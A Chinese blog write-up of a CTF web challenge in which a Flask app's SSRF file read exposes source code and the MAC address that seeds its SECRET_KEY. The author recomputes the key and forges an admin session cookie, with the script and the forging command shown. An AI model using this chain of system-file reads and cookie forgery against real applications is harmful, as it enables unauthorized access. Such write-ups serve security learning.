xtyy's blog
0%

[CISCN 2019华东南]Web4

发表于 分类于
本文字数: 1.9k 阅读时长 ≈ 2 分钟

[CISCN 2019华东南]Web4

Cookie伪造

[CISCN 2019华东南]Web4 | NSSCTF

1

扫目录看到有console应该是python的flask框架,重发包看响应发现是python2.7环境

2

ssrf漏洞,任意文件读取,直接读取flag不行,应该是被ban了

读取/proc/self/cmdline获得主程序位置,之后读取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# encoding:utf-8
import re
import random
import uuid
import urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random() * 233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! Read somethings'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print(str(ex))
        return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0")

这里/flag路由的验证条件就是session中username为fuck

session拿去jwt解码,得到

3

这一串base64解密后是www-data

那么我们先要获取SECRET_KEY,然后再算出jwt

1
2
3
4
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random() * 233)
app.debug = True

获取种子来源于本地的mac地址,那么读取文件

1
/sys/class/net/eth0/address

然后算出密钥

1
2
3
4
5
6
import random

#02:42:ac:02:e0:0c
mac=0x0242ac02e00c
random.seed(mac)
print(str(random.random() * 233))

这里要用python2,尽量和题目环境保持一致

然后利用工具flask-session-cookie-manager还原jwt

1
2
D:\CTF工具箱\Web\jwt密钥爆破\flask-session-cookie-manager-1.2.1.1>python3 flask_session_cookie_manager3.py encode -s 132.601877456 -t "{'username':'fuck'}"
eyJ1c2VybmFtZSI6ImZ1Y2sifQ.Z6M_3A.J5JV431Gv13RcWlWxmn-ZCNbqZk

替换session重发包得到flag